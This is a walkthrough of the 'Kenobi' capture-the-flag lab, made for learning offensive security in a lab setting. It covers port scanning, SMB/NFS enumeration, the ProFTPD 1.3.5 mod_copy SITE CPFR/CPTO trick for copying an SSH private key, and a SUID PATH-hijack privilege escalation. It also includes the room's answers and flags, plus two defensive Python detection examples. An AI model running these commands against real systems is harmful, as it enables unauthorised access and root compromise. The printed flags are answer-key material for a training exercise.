# Kenobi

## Scanning

```
sudo nmap -sS -A -T4 10.10.184.162 -oN initialscan.nmap

Starting Nmap 7.60 ( https://nmap.org ) at 2023-03-26 05:54 BST
Nmap scan report for ip-10-10-184-162.eu-west-1.compute.internal (10.10.184.162)
Host is up (0.00064s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         ProFTPD 1.3.5
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
|   256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
|_  256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (EdDSA)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/admin.html
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
111/tcp  open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      47705/tcp  mountd
|   100005  1,2,3      48332/udp  mountd
|   100021  1,3,4      39455/tcp  nlockmgr
|   100021  1,3,4      54592/udp  nlockmgr
|   100227  2,3         2049/tcp  nfs_acl
|_  100227  2,3         2049/udp  nfs_acl
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open  nfs_acl     2-3 (RPC #100227)
MAC Address: 02:EE:F3:F5:03:59 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=3/26%OT=21%CT=1%CU=33751%PV=Y%DS=1%DC=D%G=Y%M=02EEF3%T
OS:M=641FD021%P=x86_64-pc-linux-gnu)SEQ(SP=FB%GCD=1%ISR=FB%TI=Z%CI=I%TS=8)S
OS:EQ(SP=FB%GCD=1%ISR=FB%TI=Z%CI=I%II=I%TS=8)SEQ(SP=FB%GCD=1%ISR=FB%TI=Z%TS
OS:=8)OPS(O1=M2301ST11NW7%O2=M2301ST11NW7%O3=M2301NNT11NW7%O4=M2301ST11NW7%
OS:O5=M2301ST11NW7%O6=M2301ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF
OS:%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M2301NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40
OS:%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=
OS:%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%
OS:W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=
OS:)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%
OS:DFI=N%T=40%CD=S)

Network Distance: 1 hop
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: kenobi
|   NetBIOS computer name: KENOBI\x00
|   Domain name: \x00
|   FQDN: kenobi
|_  System time: 2023-03-25T23:54:52-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-03-26 05:54:52
|_  start_date: 1600-12-31 23:58:45

TRACEROUTE
HOP RTT     ADDRESS
1   0.64 ms ip-10-10-184-162.eu-west-1.compute.internal (10.10.184.162)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.85 seconds

```

{% hint style="info" %}
**Ports open**

7
{% endhint %}

## Enumerate SMB Shares

### Nmap smb enumeration scripts

```
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.184.162
```

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FrbYiJ0V7TCXoikcfYTJT%2Fimage.png?alt=media&#x26;token=b21f5092-06ad-4231-a74b-cceec59c4f9c" alt=""><figcaption></figcaption></figure>

### Connect with smbclient to the share

```
smbclient //10.10.184.162/anonymous
```

A file named log.txt is present. Use the get command to download it:

```
get log.txt
# recursively download all files from the share instead
smbget -R smb://10.10.184.162/anonymous
```

log.txt contains important information about FTP and NFS.

#### ssh key location

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FDBHrTxDEOQ5bnaHRq3Su%2Fimage.png?alt=media&#x26;token=36e9497d-04bd-4256-8d05-632a19ee970b" alt=""><figcaption></figcaption></figure>

#### Anonymous FTP login allowed


<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2Fby1FXpUVK4QgAIoKuhwq%2Fimage.png?alt=media&#x26;token=008cd27e-8661-4247-9731-4fe20806503a" alt=""><figcaption></figcaption></figure>

{% hint style="info" %}
**Using the nmap command above, how many shares have been found?**

3

**Once you're connected, list the files on the share. What is the file can you see?**

log.txt

**What port is FTP running on?**

21

**What mount can we see?**

/var
{% endhint %}

### Enumerate RPC bind

```
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.184.162
```

<mark style="color:blue;">**We have /var directory as mount**</mark>

```
Nmap scan report for ip-10-10-184-162.eu-west-1.compute.internal (10.10.184.162)
Host is up (0.00017s latency).

PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-ls: Volume /var
|   access: Read Lookup NoModify NoExtend NoDelete NoExecute
| PERMISSION  UID  GID  SIZE  TIME                 FILENAME
| rwxr-xr-x   0    0    4096  2019-09-04T08:53:24  .
| rwxr-xr-x   0    0    4096  2019-09-04T12:27:33  ..
| rwxr-xr-x   0    0    4096  2019-09-04T12:09:49  backups
| rwxr-xr-x   0    0    4096  2019-09-04T10:37:44  cache
| rwxrwxrwt   0    0    4096  2019-09-04T08:43:56  crash
| rwxrwsr-x   0    50   4096  2016-04-12T20:14:23  local
| rwxrwxrwx   0    0    9     2019-09-04T08:41:33  lock
| rwxrwxr-x   0    108  4096  2019-09-04T10:37:44  log
| rwxr-xr-x   0    0    4096  2019-01-29T23:27:41  snap
| rwxr-xr-x   0    0    4096  2019-09-04T08:53:24  www
|_
| nfs-showmount: 
|_  /var *
| nfs-statfs: 
|   Filesystem  1K-blocks  Used       Available  Use%  Maxfilesize  Maxlink
|_  /var        9204224.0  1836524.0  6877104.0  22%   16.0T        32000
MAC Address: 02:EE:F3:F5:03:59 (Unknown)

```

## Gain initial access with ProFtpd

Search for exploits for ProFTPD 1.3.5:

```
searchsploit proftpd 1.3.5
```

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FwanFiix0GSpP2YlD68PT%2Fimage.png?alt=media&#x26;token=6192d85c-dacf-4736-a8e2-bed87349fdaf" alt=""><figcaption></figcaption></figure>

The vulnerable ProFTPD 1.3.5 version allows files to be copied without authentication. Copy the SSH key we found earlier into the /var folder, which is exported over NFS.

The mod\_copy module implements SITE CPFR and SITE CPTO commands, which can be used to copy files/directories from one place to another on the server. Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination.

```
nc 10.10.184.162 21
SITE CPFR /home/kenobi/.ssh/id_rsa
SITE CPTO /var/tmp/id_rsa
```
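As an added example (not part of the original writeup), the following Python detection logic pairs SITE CPFR/CPTO commands per client in an FTP command log and flags copies that were issued without a completed login or that read from sensitive paths. The log line shape (date, time, client, user or `-`, quoted raw command, response code) and the sample lines are constructed assumptions, not ProFTPD's default log format.

```python
import re

# Constructed log shape (assumption, not ProFTPD's default format):
#   date time client user "raw command" response-code
LINE_RE = re.compile(
    r'^(?P<ts>\S+ \S+) (?P<client>\S+) (?P<user>\S+) "(?P<cmd>[^"]*)" (?P<code>\d{3})$'
)

# Source paths that a mod_copy copy should never touch in normal use.
SENSITIVE = ("/.ssh/", "/etc/shadow", "/etc/passwd", "/root/")

# Constructed sample: one unauthenticated key copy, one benign authenticated copy.
SAMPLE_LOG = """\
2023-03-26 05:57:40 10.10.14.5 - "USER anonymous" 331
2023-03-26 05:58:01 10.10.14.5 - "SITE CPFR /home/kenobi/.ssh/id_rsa" 350
2023-03-26 05:58:03 10.10.14.5 - "SITE CPTO /var/tmp/id_rsa" 250
2023-03-26 06:02:10 10.10.14.9 alice "SITE CPFR /home/alice/report.txt" 350
2023-03-26 06:02:11 10.10.14.9 alice "SITE CPTO /home/alice/backup/report.txt" 250
"""

def parse_line(line):
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None

def find_mod_copy_abuse(lines):
    """Pair each accepted CPFR with the next CPTO from the same client and flag risky copies."""
    pending = {}    # client -> (user, source path) after an accepted CPFR (3xx reply)
    findings = []
    for raw in lines:
        rec = parse_line(raw)
        if rec is None:
            continue
        parts = rec["cmd"].split(None, 2)
        if len(parts) < 3 or parts[0].upper() != "SITE":
            continue
        sub, arg = parts[1].upper(), parts[2]
        if sub == "CPFR" and rec["code"].startswith("3"):
            pending[rec["client"]] = (rec["user"], arg)
        elif sub == "CPTO" and rec["client"] in pending:
            user, src = pending.pop(rec["client"])
            reasons = []
            if user == "-":                      # no USER/PASS completed
                reasons.append("unauthenticated")
            if any(s in src for s in SENSITIVE):
                reasons.append("sensitive source")
            if reasons:
                findings.append({"client": rec["client"], "src": src, "dst": arg,
                                 "succeeded": rec["code"].startswith("2"),
                                 "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in find_mod_copy_abuse(SAMPLE_LOG.splitlines()):
        print(f)
```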

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FJxYDVvfXmzjveJCtgOra%2Fimage.png?alt=media&#x26;token=00aca93f-3839-4df1-9352-5de105eca49d" alt=""><figcaption></figcaption></figure>

Now we can mount the /var folder on our machine and get the private key

```
mkdir /mnt/kenobiNFS
mount 10.10.184.162:/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS
```

Copy the key to the current folder and use it to access the machine:

```
cp /mnt/kenobiNFS/tmp/id_rsa .
chmod 600 id_rsa
ssh -i id_rsa kenobi@10.10.184.162
```

{% hint style="info" %}
**Let's get the version of ProFtpd. Use netcat to connect to the machine on the FTP port.**

**What is the version?**

1.3.5

**How many exploits are there for the ProFTPd running?**

4

**What is Kenobi's user flag (/home/kenobi/user.txt)?**

d0b0f3f53b6caa532a83915e19224899
{% endhint %}

## Priv Escalation

Check for SUID binaries:

```
find / -perm -u=s -type f 2>/dev/null
```

We found a suspicious binary:

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2F8vBsuNwvL6h95Flz5tBS%2Fimage.png?alt=media&#x26;token=1eb5ff57-afc8-42d7-b8a5-038bb56e2c21" alt=""><figcaption></figcaption></figure>

Checking the strings, we see that the binaries it calls (curl, ifconfig) are invoked without a full path, so they are resolved through the caller's PATH:

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FbBgkyDJEUOSdKHpfpEmM%2Fimage.png?alt=media&#x26;token=26d6c944-1656-484e-849f-e66ee74127bc" alt=""><figcaption></figcaption></figure>

Copy the shell to the current directory, rename it to one of those binaries (ifconfig here), make it executable and prepend the directory to PATH:

```
which sh
cp /bin/sh ifconfig      # or: echo /bin/sh > ifconfig
chmod +xs ifconfig
export PATH=/home/kenobi:$PATH
```

Now run menu and select the option that calls that binary; we get a root shell. <mark style="color:red;">using curl did not work for me</mark>
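Added example, not from the original writeup: a small Python audit that extracts printable strings from a SUID binary the way strings(1) does, reports commands invoked by bare name (the defect that makes /usr/bin/menu hijackable through PATH), and shows the absolute-path form the program should use instead. The sample binary bytes and the assumed locations in ABSOLUTE are constructed.

```python
import string

# Byte values strings(1) treats as printable (no control characters).
PRINTABLE = set(string.printable.encode()) - set(b"\t\n\r\x0b\x0c")

# Commands a SUID wrapper typically shells out to; invoked by bare name they
# are resolved through the caller's PATH, which the caller controls.
COMMON_COMMANDS = {"curl", "ifconfig", "uname", "ls", "cat", "id", "whoami",
                   "ps", "netstat", "sh", "bash"}

# Assumed absolute locations for the hardened form (verify with `which` on the host).
ABSOLUTE = {"curl": "/usr/bin/curl", "ifconfig": "/sbin/ifconfig"}

# Constructed stand-in for a SUID binary: two bare invocations, one absolute.
SAMPLE_BINARY = (b"\x7fELF" + b"\x00" * 4 + b"Enter your choice:\x00"
                 + b"curl -I localhost\x00" + b"/bin/ls -la\x00" + b"ifconfig\x00")

def extract_strings(data, min_len=4):
    """Return printable runs of at least min_len bytes, like strings(1)."""
    out, run = [], bytearray()
    for b in data + b"\x00":           # trailing NUL flushes the last run
        if b in PRINTABLE:
            run.append(b)
            continue
        if len(run) >= min_len:
            out.append(run.decode("ascii"))
        run = bytearray()
    return out

def find_relative_commands(data):
    """Return (string, command) pairs where a known command is called by bare name."""
    hits = []
    for s in extract_strings(data):
        tokens = s.strip().split(None, 1)
        if tokens and tokens[0] in COMMON_COMMANDS:   # '/usr/bin/curl' would not match
            hits.append((s, tokens[0]))
    return hits

def hardened_form(cmd_string):
    """Rewrite a bare invocation to its absolute path so PATH no longer matters."""
    head, _, rest = cmd_string.strip().partition(" ")
    full = ABSOLUTE.get(head)
    return cmd_string if full is None else (full + " " + rest).strip()

if __name__ == "__main__":
    for s, cmd in find_relative_commands(SAMPLE_BINARY):
        print(f"bare call {cmd!r} in {s!r} -> use {hardened_form(s)!r}")
```

A SUID program should additionally reset PATH to a fixed value or call execve with the absolute path directly; flagging the strings is only the audit step.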

{% hint style="info" %}
**What file looks particularly out of the ordinary?**&#x20;

/usr/bin/menu

**Run the binary, how many options appear?**

3

**What is the root flag (/root/root.txt)?**

177b3cd8562289f37382721c28381f02
{% endhint %}


### Gaining direct shell

```
searchsploit -m 36803.py
python2 -m pip install requests
# did not work for me, we may need write permissions for it to work. It also has a Metasploit version, which does not work either
```
